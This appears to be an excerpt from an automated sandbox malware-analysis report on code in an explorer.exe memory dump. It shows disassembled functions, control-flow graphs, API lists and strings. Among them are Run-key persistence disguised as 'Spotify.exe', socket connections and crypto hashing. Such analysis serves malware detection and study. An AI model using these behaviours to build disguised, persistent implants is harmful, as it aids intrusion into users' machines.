                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$FileLibraryLoadModuleName
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${56B2BCE6-A24C-48AB-82DC-EE1FC9C9389D}${80130DAC-3FD0-43E8-A3CA-91C0865C2735}
                          • API String ID: 2450766465-982829053
                          • Opcode ID: b9869db3e5f7c4508dfd2fe2599929d060a4f2c79dbf368f78a08d4dec883f46
                          • Instruction ID: ff690048291165ff3197f57ef73099774f6a9feffe4e6d2b5aaf502013fd1f73
                          • Opcode Fuzzy Hash: b9869db3e5f7c4508dfd2fe2599929d060a4f2c79dbf368f78a08d4dec883f46
                          • Instruction Fuzzy Hash: D9414970224B8592EB2CEF70F8593DA73A1FB84758F80453DD69A86664DF3DC19ACB40
                          Function 011B2340 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 132threadnetworkstringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 814 11b2340-11b2358 lstrlenW 815 11b235a-11b237c CreateEventW 814->815 816 11b23d0-11b23d7 814->816 815->816 817 11b237e-11b23b2 CreateThread 815->817 818 11b23dd-11b23e5 call 11adef0 816->818 819 11b24bc-11b24c3 816->819 822 11b23b8-11b23c5 LocalFree 817->822 823 11b23b4 817->823 818->819 831 11b23eb-11b2427 call 119f510 818->831 820 11b24ca-11b24d1 819->820 821 11b24c5 call 119f200 819->821 827 11b24d8-11b24df 820->827 828 11b24d3 call 119ee80 820->828 821->820 822->816 823->816 829 11b24e1 call 11ac1a0 827->829 830 11b24e6-11b24f7 call 11a6800 827->830 828->827 829->830 839 11b24f9-11b251b CreateEventW 830->839 840 11b2562-11b2573 WSAStartup 830->840 831->819 838 11b242d-11b24b6 call 11b84a8 call 1197ef0 LocalFree 831->838 838->819 839->840 842 11b251d-11b2551 CreateThread 839->842 843 11b25ed 840->843 844 11b2575-11b257c 840->844 847 11b2553 842->847 848 11b2555-11b255c CloseHandle 842->848 845 11b25f2-11b25fa 843->845 849 11b25aa-11b25de CreateThread 844->849 850 11b257e-11b25a3 CreateThread 844->850 847->840 848->840 852 11b25e0-11b25e5 849->852 853 11b25e7 WSACleanup 849->853 850->849 852->845 853->843
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartuplstrlen
                          • String ID: "%s%s"$Spotify.exe${669627E2-6B39-4990-B906-8786734FF1DD}
                          • API String ID: 168511978-1023982500
                          • Opcode ID: 9aebad6ca0014e8195b976bf8917804cce9ca2f0a7ce69afa20890b83307dac2
                          • Instruction ID: 334f95d01d7590dfd38f54559a845cf472084a158bbc993863a70ced0cb44453
                          • Opcode Fuzzy Hash: 9aebad6ca0014e8195b976bf8917804cce9ca2f0a7ce69afa20890b83307dac2
                          • Instruction Fuzzy Hash: 26616C71204B49C2FB2CEF64F9987DA77A5F798748F40412ADA4A87A64CF7CC189CB41
                          Function 011ADC00 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 106encryptionsynchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 961 11adc00-11adc57 CryptAcquireContextW 962 11adc5d-11adc80 CryptCreateHash 961->962 963 11addc3-11addc9 961->963 964 11adc86-11adcc0 962->964 965 11adda5-11addbb CryptReleaseContext 962->965 966 11addcb-11addd2 CryptReleaseContext 963->966 967 11addd8-11addde 963->967 970 11adccc-11adcd4 964->970 965->963 966->967 968 11addeb-11addf3 967->968 969 11adde0-11adde5 CryptDestroyHash 967->969 969->968 971 11adcd6-11adcdc 970->971 972 11add35-11add3a 970->972 973 11adcde-11adcf0 WaitForSingleObject 971->973 974 11adcfc-11add17 CryptHashData 971->974 975 11add5c-11add8b CryptGetHashParam 972->975 976 11add3c-11add56 CryptHashData 972->976 973->974 977 11adcf2 973->977 978 11add19 974->978 979 11add23-11add33 974->979 981 11add8d 975->981 982 11add91-11add9c CryptDestroyHash 975->982 976->975 980 11add58 976->980 977->963 978->963 979->970 980->963 981->963 982->965
                          APIs
                          Strings
                          • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 011ADC40
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                          • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                          • API String ID: 1452691613-63410773
                          • Opcode ID: f6a205860e882ed8ebe0ba0d3915f1ee79818a5dd84249d0a98f84a41e6c144c
                          • Instruction ID: dac46f1a2099aa3bb034c346dede1b80793b113227aab751646fe88baf021091
                          • Opcode Fuzzy Hash: f6a205860e882ed8ebe0ba0d3915f1ee79818a5dd84249d0a98f84a41e6c144c
                          • Instruction Fuzzy Hash: 07510D36218A8086E758DF59F45479EBBA1F7C4784F505029F78A82EA8CF7DC445CF40
                          Function 011B23B6 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 101threadnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • LocalFree.KERNEL32 ref: 011B24B6
                          • CreateEventW.KERNEL32 ref: 011B2506
                          • CreateThread.KERNEL32 ref: 011B253C
                          • CloseHandle.KERNEL32 ref: 011B255C
                          • WSAStartup.WS2_32 ref: 011B256B
                          • CreateThread.KERNEL32 ref: 011B259D
                          • CreateThread.KERNEL32 ref: 011B25C9
                            • Part of subcall function 011ADEF0: AllocateAndInitializeSid.ADVAPI32 ref: 011ADF62
                            • Part of subcall function 011ADEF0: CheckTokenMembership.ADVAPI32 ref: 011ADF7F
                            • Part of subcall function 011ADEF0: FreeSid.ADVAPI32 ref: 011ADF96
                          • WSACleanup.WS2_32 ref: 011B25E7
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                            • Part of subcall function 01197EF0: CoInitializeEx.COMBASE ref: 01197FFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$FreeThreadlstrlen$InitializeLocal$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken_errno_invalid_parameter_noinfo
                          • String ID: "%s%s"$Spotify.exe${669627E2-6B39-4990-B906-8786734FF1DD}
                          • API String ID: 2779143808-1023982500
                          • Opcode ID: a82c63f49fc84d51f6ceb823c207fd6abdfa60ac5806495aac224a5eadf16768
                          • Instruction ID: 38a37e63344a0b77943ac9b17367ed622de38b3eeaba893e741b4ea3136b0005
                          • Opcode Fuzzy Hash: a82c63f49fc84d51f6ceb823c207fd6abdfa60ac5806495aac224a5eadf16768
                          • Instruction Fuzzy Hash: 69515B31104B9586FB3DEF64F8987DA77A5F798348F40412ADA8A86A64DF3CC189CB41
                          Function 011BF6DC Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateInformationVersion
                          • String ID:
                          • API String ID: 3563531100-0
                          • Opcode ID: c525bb8dc8427b67045047140108d528e73815ef1e63f505b45dd767e355412e
                          • Instruction ID: 61c29c7c1b8f3ecfa20baa02da060e850f9ad9ca4dc62c33b8cefdcf3de47ad6
                          • Opcode Fuzzy Hash: c525bb8dc8427b67045047140108d528e73815ef1e63f505b45dd767e355412e
                          • Instruction Fuzzy Hash: 03E0DF78615F5182FB8C5B14E899BD92261F789381F806029EB4E42764DF3CC08BC708
                          Function 011A8830 Relevance: 119.9, APIs: 51, Strings: 17, Instructions: 909libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL
                          • API String ID: 2574300362-2969658442
                          • Opcode ID: f90370e5532e15aea78f9185266f08c44aefdf0f6daa0f53754c809366cb5b92
                          • Instruction ID: 7d6b9f347e311238f35b472639f9c6e2aed3dc907d8f44ae0ab2b39207dda178
                          • Opcode Fuzzy Hash: f90370e5532e15aea78f9185266f08c44aefdf0f6daa0f53754c809366cb5b92
                          • Instruction Fuzzy Hash: 27B2E83A218B89C5EB78CB14F4943EAB760F7C9759F810516CA8E43B68DF38C199CB41
                          Function 011B3C70 Relevance: 61.8, APIs: 41, Instructions: 306networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 433 11b3c70-11b3cab socket 434 11b3cad-11b3caf 433->434 435 11b3cb4-11b3ccb WSAGetLastError WSACreateEvent 433->435 438 11b42c9-11b42d0 434->438 436 11b3ccd 435->436 437 11b3cd7-11b3cef WSAEventSelect 435->437 439 11b42ac-11b42c7 shutdown closesocket 436->439 440 11b3cfb-11b3d05 437->440 441 11b3cf1 437->441 439->438 443 11b3d0b-11b3d15 440->443 444 11b3f1e-11b3f33 440->444 442 11b42a1-11b42a6 CloseHandle 441->442 442->439 445 11b3d17-11b3d22 443->445 446 11b3d24-11b3d3b inet_addr 443->446 447 11b3f45-11b3f62 inet_addr 444->447 448 11b3f35-11b3f43 444->448 449 11b3d76-11b3db4 htons connect 445->449 446->449 450 11b3d3d-11b3d56 gethostbyname 446->450 451 11b3fa9-11b3ff6 htons connect 447->451 452 11b3f64-11b3f83 gethostbyname 447->452 448->451 458 11b3dba-11b3dc5 WSAGetLastError 449->458 459 11b3f19 449->459 456 11b3d58-11b3d6a 450->456 457 11b3d6c 450->457 451->442 455 11b3ffc-11b4007 WSAGetLastError 451->455 453 11b3f9f 452->453 454 11b3f85-11b3f9d 452->454 453->442 454->451 455->442 460 11b400d-11b402e 455->460 456->449 457->442 458->459 461 11b3dcb-11b3de6 458->461 459->442 462 11b4050-11b4087 WSAWaitForMultipleEvents 460->462 463 11b4030-11b4049 460->463 464 11b3de8-11b3dfb 461->464 465 11b3dff-11b3e2a WSAWaitForMultipleEvents 461->465 466 11b4089-11b4094 462->466 467 11b40a0-11b40b8 WSACloseEvent closesocket 462->467 463->462 464->465 468 11b3e49-11b3e51 465->468 469 11b3e2c-11b3e44 WSACloseEvent closesocket 465->469 466->467 472 11b4096-11b409e 466->472 467->438 470 11b3e53-11b3e6b WSACloseEvent closesocket 468->470 471 11b3e70-11b3e75 468->471 469->438 470->438 473 11b3e77-11b3e8e WSAEnumNetworkEvents 471->473 474 11b3ef5-11b3efa 471->474 472->467 475 11b40bd-11b40c5 472->475 476 11b3ead-11b3eb6 473->476 477 11b3e90-11b3ea8 closesocket WSACloseEvent 473->477 474->459 478 11b3efc-11b3f14 closesocket WSACloseEvent 474->478 475->442 479 11b40cb-11b40e5 WSAEnumNetworkEvents 475->479 480 11b3eb8-11b3ed0 closesocket WSACloseEvent 476->480 481 11b3ed5-11b3ede 476->481 477->438 478->438 482 11b40e7-11b40ff WSACloseEvent closesocket 479->482 483 11b4104-11b410c 479->483 480->438 481->474 484 11b3ee0-11b3ef0 WSACloseEvent 481->484 482->438 485 11b412b-11b4135 483->485 486 11b410e-11b4126 WSACloseEvent closesocket 483->486 484->438 487 11b4152-11b416f inet_addr 485->487 488 11b4137-11b4150 485->488 486->438 490 11b417e 487->490 491 11b4171-11b417c 487->491 489 11b4189-11b4191 488->489 492 11b421a-11b4222 489->492 493 11b4197-11b41fe call 11b42e0 489->493 490->489 491->489 492->442 495 11b4224-11b428d call 11b4470 492->495 498 11b4200-11b4210 CloseHandle 493->498 499 11b4215 493->499 495->442 501 11b428f-11b429f CloseHandle 495->501 498->438 499->442 501->438 501->442
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateErrorEventLastclosesocketshutdownsocket
                          • String ID:
                          • API String ID: 1739004367-0
                          • Opcode ID: dcaf40f4610bbbedde6c4bc399f23527267634a2a82ab33fdc6244b7fdff342a
                          • Instruction ID: 3c3188979d06db3188d2dea25b5ba7c8339c8451e44c9afd2ed96031e3f2c02c
                          • Opcode Fuzzy Hash: dcaf40f4610bbbedde6c4bc399f23527267634a2a82ab33fdc6244b7fdff342a
                          • Instruction Fuzzy Hash: B8F1ED36228AC4CAD7689F15F8847DAB7A0F789755F004126EB9B87A69DF3CC445CF01
                          Function 011A6800 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 239memoryfilestringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 627 11a6800-11a681a call 11a59c0 630 11a681c-11a681e 627->630 631 11a6823-11a683f call 119f790 627->631 633 11a6d5e-11a6d65 630->633 635 11a6d5c 631->635 636 11a6845-11a6870 call 11a5aa0 631->636 635->633 639 11a6d51-11a6d56 LocalFree 636->639 640 11a6876-11a6891 LocalAlloc 636->640 639->635 641 11a6d2b-11a6d31 640->641 642 11a6897-11a6904 lstrcpyW StrStrIW CreateFileW 640->642 643 11a6d3e-11a6d44 641->643 644 11a6d33-11a6d38 LocalFree 641->644 645 11a690a-11a6920 GetFileSize 642->645 646 11a6d20-11a6d25 LocalFree 642->646 643->639 647 11a6d46-11a6d4b LocalFree 643->647 644->643 648 11a6d0d-11a6d13 645->648 649 11a6926-11a6942 LocalAlloc 645->649 646->641 647->639 648->646 650 11a6d15-11a6d1a CloseHandle 648->650 649->648 651 11a6948-11a6979 ReadFile 649->651 650->646 652 11a697f-11a69e4 CloseHandle 651->652 653 11a6d02-11a6d07 LocalFree 651->653 654 11a69f6-11a6a04 652->654 653->648 655 11a6a50-11a6a6b call 11b0e30 654->655 656 11a6a06-11a6a4e call 11acf50 654->656 655->653 662 11a6a71-11a6a93 call 11a73a0 655->662 656->654 665 11a6a99-11a6aba LocalAlloc 662->665 666 11a6cad-11a6cb6 662->666 665->666 667 11a6ac0-11a6ae1 LocalAlloc 665->667 666->653 668 11a6cb8-11a6cd6 call 11a7320 666->668 669 11a6c9f-11a6ca7 LocalFree 667->669 670 11a6ae7-11a6bb1 call 11b8c60 lstrcpyW * 3 667->670 668->653 675 11a6cd8-11a6cfc VirtualFree 668->675 669->666 678 11a6c91-11a6c99 LocalFree 670->678 679 11a6bb7-11a6bc2 670->679 675->653 678->669 680 11a6bd4-11a6bdc 679->680 680->678 681 11a6be2-11a6c02 680->681 682 11a6c08-11a6c33 681->682 683 11a6c8c 681->683 684 11a6c53-11a6c87 LocalFree * 4 682->684 685 11a6c35-11a6c4b 682->685 683->680 684->633 685->684
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                          • String ID: .DLL
                          • API String ID: 2968648924-899428287
                          • Opcode ID: 94ce4cef34f48db25710ebb7938b358f5a319298ed3ba92ef7ae4f5844074c4b
                          • Instruction ID: 455bb72b93734b870986b6d69c7d07a267edd811366cf39788a8f4b3d78d7895
                          • Opcode Fuzzy Hash: 94ce4cef34f48db25710ebb7938b358f5a319298ed3ba92ef7ae4f5844074c4b
                          • Instruction Fuzzy Hash: 61D1DC76208B8486E768DB19F49439AB7A1F7C47A4F504225D79E87BA8DF3CC489CF40
                          Function 0119F200 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 74registrymemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 855 119f200-119f220 call 119f510 858 119f35f-119f368 855->858 859 119f226-119f241 LocalAlloc 855->859 860 119f354-119f359 LocalFree 859->860 861 119f247-119f286 wnsprintfW 859->861 860->858 862 119f288-119f2a3 RegOpenKeyW 861->862 863 119f2e4-119f2eb 861->863 862->863 864 119f2a5-119f2de RegSetValueExW RegCloseKey 862->864 865 119f349-119f34e LocalFree 863->865 866 119f2ed-119f308 RegOpenKeyW 863->866 864->863 865->860 866->865 867 119f30a-119f343 RegSetValueExW RegCloseKey 866->867 867->865
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • LocalAlloc.KERNEL32 ref: 0119F230
                          • wnsprintfW.SHLWAPI ref: 0119F275
                          • RegOpenKeyW.ADVAPI32 ref: 0119F29B
                          • RegSetValueExW.ADVAPI32 ref: 0119F2D3
                          • RegCloseKey.ADVAPI32 ref: 0119F2DE
                          • RegOpenKeyW.ADVAPI32 ref: 0119F300
                          • RegSetValueExW.ADVAPI32 ref: 0119F338
                          • RegCloseKey.ADVAPI32 ref: 0119F343
                          • LocalFree.KERNEL32 ref: 0119F34E
                          • LocalFree.KERNEL32 ref: 0119F359
                          Strings
                          • {669627E2-6B39-4990-B906-8786734FF1DD}, xrefs: 0119F247
                          • %s%s %s, xrefs: 0119F264
                          • Spotify.exe, xrefs: 0119F253
                          • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F28D
                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F2F2
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Freelstrlen$AllocCloseOpenValue$FolderKnownPathTaskwnsprintf
                          • String ID: %s%s %s$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$Spotify.exe${669627E2-6B39-4990-B906-8786734FF1DD}
                          • API String ID: 1790340015-4130844771
                          • Opcode ID: 899e22331facbcdfbf37d5bf2fdf3218fac895a1e0c2bb22c5d9f5c6331109ac
                          • Instruction ID: 466084487701c7a857861851c8c3c6fd41e32172d7b3f41fb7b0fe3a6031ad3f
                          • Opcode Fuzzy Hash: 899e22331facbcdfbf37d5bf2fdf3218fac895a1e0c2bb22c5d9f5c6331109ac
                          • Instruction Fuzzy Hash: 25312A35208A4596EB18DF19F8847DA77B0F785798F50012AEB9E83B68DF7DC54ACB00
                          Function 01199D70 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 882 1199d70-1199d8f LocalAlloc 883 1199e7a 882->883 884 1199d95-1199db0 LocalAlloc 882->884 885 1199e7c-1199e80 883->885 886 1199e6f-1199e74 LocalFree 884->886 887 1199db6-1199dd1 LocalAlloc 884->887 886->883 888 1199e64-1199e69 LocalFree 887->888 889 1199dd7-1199dec GetModuleFileNameW 887->889 888->886 890 1199e59-1199e5e LocalFree 889->890 891 1199dee-1199e00 GetSystemDirectoryW 889->891 890->888 891->890 892 1199e02-1199e2f call 11b84a8 lstrcmpiW 891->892 892->890 895 1199e31-1199e57 LocalFree * 3 892->895 895->885
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
